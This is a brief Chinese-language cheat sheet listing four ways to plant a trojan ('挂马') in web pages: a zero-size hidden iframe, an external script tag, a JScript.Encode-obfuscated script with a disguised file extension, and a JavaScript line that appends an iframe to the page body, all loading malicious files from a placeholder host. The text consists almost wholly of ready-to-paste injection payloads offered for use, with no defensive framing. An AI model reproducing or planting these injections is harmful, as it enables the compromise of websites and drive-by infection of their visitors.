一、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
二、js挂马
<script src=http://www.xxx.com/muma.js></script>
三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + ‘<iframe src="木马地址"></iframe>‘